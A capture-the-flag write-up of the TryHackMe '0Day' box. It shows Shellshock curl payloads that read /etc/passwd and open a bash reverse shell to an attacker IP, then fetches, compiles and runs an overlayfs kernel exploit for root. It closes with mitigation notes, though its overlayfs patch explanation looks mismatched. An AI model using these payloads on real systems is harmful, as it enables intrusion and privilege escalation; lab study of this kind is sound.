Box Overview

0Day is a medium-rated TryHackMe box with the description: “Exploit Ubuntu, like a Turtle in a Hurricane”

This writeup covers exploiting the Shellshock vulnerability (CVE-2014-6271) for initial access and leveraging an overlayfs kernel exploit for privilege escalation.

Enumeration

Nmap Scan

Initial port scan reveals two open services:

nmap -sC -sV -oA nmap/initial [TARGET_IP]

Results:

  • Port 22: SSH (OpenSSH)
  • Port 80: HTTP (Apache httpd 2.4.7 Ubuntu)

Web Enumeration

The website displays a single static page with no immediately useful information. Browser inspection tools revealed nothing interesting.

Directory Fuzzing

gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Interesting discoveries:

  • /backup/ - Contains an RSA private key
  • /secret/ - Directory with “turtle” reference
  • /cgi-bin/ - CGI script directory

Backup Directory

Found an exposed RSA private key at /backup/:

-----BEGIN RSA PRIVATE KEY-----
[Private Key Content]
-----END RSA PRIVATE KEY-----

However, brute-forcing the key wasn’t the intended path (CTFs typically avoid brute-force solutions).

Nikto Scan

nikto -h http://[TARGET_IP]

Key findings:

  • robots.txt present (no useful content)
  • /cgi-bin/test.cgi - CGI script endpoint

Accessing /cgi-bin/test.cgi displays: “Hello World!”

Exploitation - Shellshock

Vulnerability Identification

Reference: HackTricks - CGI Pentesting

Shellshock (CVE-2014-6271) allows attackers to execute arbitrary commands by injecting malicious code into environment variables passed to Bash through CGI scripts.

The vulnerability exists because:

  • Bash processes environment variables before executing commands
  • Attackers can append commands after function definitions in environment variables
  • Old Apache versions with cgi_mod are vulnerable

Testing for Vulnerability

curl -H "User-Agent: () { :; }; echo vulnerable" http://[TARGET_IP]/cgi-bin/test.cgi

Result: Error message indicating Shellshock vulnerability! ✅

Information Gathering

Extract system user information:

curl -H "User-Agent: () { :; }; /bin/bash -c 'whoami'" http://[TARGET_IP]/cgi-bin/test.cgi

Output: www-data

Read /etc/passwd:

curl -H "User-Agent: () { :; }; /bin/bash -c 'cat /etc/passwd'" http://[TARGET_IP]/cgi-bin/test.cgi

Discovered user: ryan

Reverse Shell

Setup netcat listener:

nc -lvnp 4444

Execute reverse shell via Shellshock:

curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/4444 0>&1'" \
  http://[TARGET_IP]/cgi-bin/test.cgi

Shell obtained as www-data!

User Flag

whoami
# www-data

cat /home/ryan/user.txt
# [user flag]

User flag captured!

Privilege Escalation

System Enumeration

Standard privilege escalation checks:

sudo -l
# No sudo privileges

uname -a
# Linux [hostname] 3.13.0-32-generic #57-Ubuntu

Key finding: Kernel version 3.13.0-32 is vulnerable!

Kernel Exploitation - Overlayfs

Vulnerability: CVE-2015-1328 - Overlayfs Local Privilege Escalation

Exploit: https://www.exploit-db.com/exploits/37292

Locating the Exploit

searchsploit overlayfs
# linux/local/37292.c

Prerequisites Check

Verify required tools are present:

which wget
# /usr/bin/wget

which gcc
# /usr/bin/gcc

Both available! ✅

Exploit Transfer

On attacker machine:

# Copy exploit to working directory
searchsploit -m 37292

# Start HTTP server
python3 -m http.server 8000

On target machine:

wget http://[ATTACKER_IP]:8000/37292.c

Initial Compilation Attempt

gcc 37292.c -o root_exploit

Error: Compilation failed - GCC unable to find cc1

PATH Variable Issue

Problem: Ubuntu’s PATH variable was misconfigured, preventing GCC from locating the C compiler component cc1.

Solution: Reset PATH to standard Ubuntu configuration

Reference: Ubuntu PATH Documentation

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Successful Compilation

gcc 37292.c -o root_exploit
chmod +x root_exploit

Exploit compiled successfully!

Privilege Escalation Execution

./root_exploit

ROOT SHELL OBTAINED! 🎯

whoami
# root

cat /root/root.txt
# [root flag]

Root flag captured!

Vulnerability Analysis

Shellshock (CVE-2014-6271)

Impact: Remote Code Execution via environment variable injection

Affected: Bash versions prior to 4.3

Mitigation:

  • Update Bash to patched versions
  • Disable CGI if not required
  • Implement Web Application Firewall (WAF) rules
  • Restrict CGI script permissions

Overlayfs (CVE-2015-1328)

Technical Details:

The vulnerability results from failing to verify user capabilities when setting file attributes. Specifically:

  • Overlayfs sends attribute data to underlying filesystems via vfs_setxattr()
  • It fails to verify data by calling cap_convert_nscap() first
  • Allows unprivileged users to gain elevated capabilities

Patch: Moved cap_convert_nscap() call into vfs_setxattr() to force verification on every call

Mitigation:

  • Update kernel to version 3.13.0-37 or later
  • Apply security patches regularly
  • Monitor for unusual overlayfs mount operations

Key Takeaways

Attack Chain

  1. Web Enumeration → Discovered CGI endpoint
  2. Shellshock Testing → Confirmed vulnerability via curl
  3. Remote Code Execution → Obtained reverse shell as www-data
  4. Kernel Version Discovery → Identified outdated kernel (3.13.0-32)
  5. Overlayfs Exploitation → Compiled and executed privilege escalation exploit
  6. Root Access → Full system compromise

Lessons Learned

  • Old CGI implementations are prime targets for Shellshock
  • Always enumerate web directories thoroughly
  • Kernel version information is critical for privilege escalation
  • Environment variables (PATH) can affect exploit compilation
  • Understanding underlying vulnerability mechanisms (overlayfs) enhances exploitation skills

Tools Used

  • nmap
  • gobuster
  • nikto
  • curl
  • searchsploit
  • gcc
  • netcat

Credits

Thanks to @0day for creating this engaging box that demonstrates real-world vulnerabilities in legacy systems!